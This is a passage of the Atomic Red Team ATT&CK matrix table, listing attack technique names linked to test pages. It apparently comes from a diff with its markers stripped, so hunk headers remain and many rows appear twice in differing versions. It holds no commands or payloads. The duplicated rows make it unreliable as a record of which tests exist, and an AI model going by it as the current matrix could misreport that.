| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
| [Content Injection](../../T1659/T1659.md) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
@@ -23,9 +23,9 @@
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
| | [Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md) | [Server Software Component: Terminal Services DLL](../../T1505.005/T1505.005.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Impair Defenses: Safe Boot Mode](../../T1562.009/T1562.009.md) | [OS Credential Dumping: LSASS Memory](../../T1003.001/T1003.001.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Video Capture](../../T1125/T1125.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Copy and Paste [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Brute Force: Password Spraying](../../T1110.003/T1110.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Outlook Rules](../../T1137.005/T1137.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | [Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | [System Services: Service Execution](../../T1569.002/T1569.002.md) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md) | [System Network Connections Discovery](../../T1049/T1049.md) | | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL](../../T1574.001/T1574.001.md) | [Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Data from Network Shared Drive](../../T1039/T1039.md) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | [Time Providers](../../T1547.003/T1547.003.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | [Log Enumeration](../../T1654/T1654.md) | | Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Non-Standard Port](../../T1571/T1571.md) | [Inhibit System Recovery](../../T1490/T1490.md) |
@@ -46,7 +46,7 @@
| | | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Account Manipulation](../../T1098/T1098.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
@@ -59,7 +59,7 @@
| | | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Account Manipulation](../../T1098/T1098.md) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Rogue Domain Controller](../../T1207/T1207.md) | | | | | | | |
| | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
@@ -70,13 +70,13 @@
| | | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Create Process with Token](../../T1134.002/T1134.002.md) | | | | | | | |
